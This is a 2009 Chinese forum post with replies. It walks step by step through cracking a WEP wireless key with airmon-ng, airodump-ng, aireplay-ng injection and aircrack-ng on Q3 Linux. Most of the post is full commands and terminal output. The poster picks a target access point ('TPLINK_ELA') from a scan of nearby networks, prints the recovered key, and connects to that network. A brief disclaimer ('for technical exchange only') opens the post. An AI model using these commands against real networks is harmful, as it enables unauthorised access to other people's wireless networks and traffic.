我也成功了!全中文Q3系统spoonwep2成功破解wep无线密码
本帖最后由 muses 于 2009-10-15 10:12 编辑声明:仅供技术交流,切勿用于非法用途,一切后果自负,You are at your own risks。
MAC地址是唯一的,为了保护隐私:****** 代表AP的MAC地址; XXXXX 代表本机无线网卡的MAC地址。
测试环境:华硕笔记本: X81; 无线网卡intel 3945abg ; U盘启动Q3
一、安装Q3和破解工具
1. 到这里下载Q3安装包:http://club.prayaya.com/thread-9486-1-1.html有安装工具,安装到U盘和硬盘都可以,很简单。
2. 成功启动之后,在Q3软件仓库里搜索并安装:spoonwep-wpa.ro ,同时自动下载sun-java6.ro
二、破解过程
1、启动无线网卡的监控模式,
在终端中输入:airmon-ng start wlan0
(wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)
root@prayaya:/# airmon-ngstart wlan0
Interface Chipset Driver
wlan0 Intel 3945 a/b/g iwl3945 -
(monitor mode enabled on mon0)
2、查看无线AP
在终端中输入:
airodump-ng mon0
(说明:启动监控模式后无线网的端口现在是 mon0 !!!)
看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端
airoroot@prayaya:/# dump-ng mon0
CH 10 ][ BAT: 1 hour 46 mins ][ Elapsed: 1 min ][ 2009-08-04 10:04
BSSID PWRBeacons #Data, #/sCHMBENCCIPHER AUTH ESSID
....
我选了这个:
******180 245 3 0 654. WEPWEP TPLINK_ELA
需要记住的:
AP的MAC地址:******
频道:6
3、抓包
另开一个终端,输入:
root@prayaya:/# airodump-ng -c 6 --bssid******-wwep mon0
CH6 ][ BAT: 1 hour 16 mins ][ Elapsed: 17 mins ][ 2009-08-04 10:42 ][ fixed channel mon0: 3
BSSID PWR RXQBeacons #Data, #/sCHMBENCCIPHER AUTH ESSID
00:14:78:B5:B5:7E00:1F:3C:62:82:56 0 1- 0 0 185235
(-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名)
4、与AP建立虚拟连接
再另开一个终端,输入:
root@prayaya:/# aireplay-ng -1 0 -a******-h XXXXXX mon0
10:29:18Waiting for beacon frame (BSSID: ******) on channel 6
10:29:18Sending Authentication Request (Open System)
10:29:18Authentication successful
10:29:18Sending Association Request
10:29:18Association successful :-) (AID: 1)
(-h后面跟着的是自己的无线网卡的MAC地址)
自己的无线网卡的MAC地址通过ifconfig查看:
root@prayaya:/# ifconfig |grep wlan0
wlan0 Link encap:EthernetHWaddrXXXXXX
5、进行注入
成功建立虚拟连接后输入:
root@prayaya:/# aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b ******-hXXXXXXXmon0
Saving chosen packet in replay_src-0804-102946.cap
You should also start airodump-ng to capture replies.
现在回头看下步骤3的终端是不是DATA在开始飞涨!
6、解密
另开一个终端,输入:
aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)
root@prayaya:/# aircrack-ng wep*.cap
Opening wep-01.cap
Opening wep-02.cap
Read 412511 packets.
#BSSID ESSID Encryption
1****** TPLINK_ELA WEP (6737 IVs)
Choosing first network as target.
Opening wep-01.cap
Opening wep-02.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 6792 ivs.
Aircrack-ng 1.0 rc1
Tested 930098 keys (got 80003 IVs)
KB depth byte(vote)
0 0/1 66(112640) 68(93696) 5F(93440) C6(92928) DA(92160) 04(91392) DE(91136) 56(89856) CA(89344)
1 0/1 65(110080) E7(89856) DB(89344) 32(89088) FF(88832) 2D(88576) 74(88064) 9E(87808) C3(87808)
2 0/1 65(113664) 81(92416) F8(92416) 22(90624) D3(90368) 91(89856) 63(89600) FF(89600) C9(88576)
3 0/1 64(109056) 6F(91904) 56(91648) BB(90880) 83(90624) 3D(90112) 98(89088) 25(88832) 1B(88576)
4 0/1 66(102656) D3(93440) 0F(92928) 78(91392) 60(90112) F0(89600) 94(88832) E3(88832) 7D(88576)
5 0/1 65(105216) B3(92672) 2F(92160) 8C(91392) 7D(91136) 27(90624) 35(90624) D2(90368) C0(89344)
6 0/1 65(107520) 31(95744) 30(92928) 0A(92672) 6B(92416) EF(91392) 74(89856) 63(89600) 66(89600)
7 0/1 64(101632) 63(92160) B8(90880) 8C(90624) A8(90112) 16(89088) 10(88576) 1C(88576) 86(88576)
8 0/1 31(112128) 37(92672) A6(89856) 00(88832) 81(88832) 2A(88064) 6E(88064) AD(88064) 99(87808)
9 0/1 30(103936) D1(92416) 06(91392) 81(91136) F0(89600) 7C(88832) 48(88576) 5F(88320) 18(88064)
10 0/1 8F(93440) 97(92416) B2(92160) 32(91904) 6D(91392) 29(90880) 57(89856) 9A(89856) 45(89600)
11 0/1 17(92928) B5(91392) C4(90112) BE(89600) C0(89600) 16(89088) 31(88832) CE(88832) ED(88832)
12 0/ 15 D4(94528) 73(92444) DB(90168) 85(89780) 4D(88096) FC(88076) 5D(88040) FF(87716) 27(87688)
KEY FOUND! [ 66:65:65:64:66:65:65:64:31:30:31:30:31 ] (ASCII: feedfeed10101 )
Decrypted correctly: 100%
等待差不多10分钟。。。。终于得到密码了: feedfeed10101
7、收工
破解出密码后在终端中输入 airmon-ng stop mon0 关闭监控模式,或者重复步聚破解其他的AP。
8、拔掉网线试试
在 开始 - 网络 - 运行 wicd 网络连接
如果提示没有找到网络,请点击首选项,在 无限网络 填上无线网络接口, 我的是wlan0
因为是成功破解之后才截图的,所有下图是已连接上的图:
在 TPLINK_ELA 点击高级设置:
输入密码:
确定,点击 高级设置 下面的连接。
ok了。。:victory:
我把网线拔了,wlan0 已经得到IP了。。
root@prayaya:/# ifconfig
eth0 Link encap:EthernetHWaddr
UP BROADCAST MULTICASTMTU:1500Metric:1
RX packets:2812 errors:0 dropped:0 overruns:0 frame:0
TX packets:1760 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2344790 (2.2 MB)TX bytes:229391 (224.0 KB)
Interrupt:247
lo Link encap:Local Loopback
inet addr:127.0.0.1Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNINGMTU:16436Metric:1
RX packets:267 errors:0 dropped:0 overruns:0 frame:0
TX packets:267 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:35501 (34.6 KB)TX bytes:35501 (34.6 KB)
wlan0 Link encap:EthernetHWaddr
inet addr:192.168.1.109Bcast:255.255.255.255Mask:255.255.255.0
inet6 addr: fe80::21f:3cff:fe62:8256/64 Scope:Link
UP BROADCAST RUNNING MULTICASTMTU:1500Metric:1
RX packets:5928 errors:0 dropped:0 overruns:0 frame:0
TX packets:5169 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6164841 (5.8 MB)TX bytes:821661 (802.4 KB)
Q3交流群:
1群:50796699
2群:29588436
3群:14493434
4群:72853613
Q3在线技术支持:1136250732
感谢分享,支持了! 感谢分享,支持了! 顶你,不错,很详细。 顶你,不错,很详细。 一步一步实验出来的,分享经验,希望大家能看到。。 嘿嘿,学习了,感觉有些想法和步骤跟BT3操作差不多的 学习学习
学习学习
学习学习
学习学习
学习学习 嘿嘿,学习了,感觉有些想法和步骤跟BT3操作差不多的 呵呵,学习了
这个好像更绿色一些哦
支持 Q3安装有教程吗? 谢谢分享,很详细,谢谢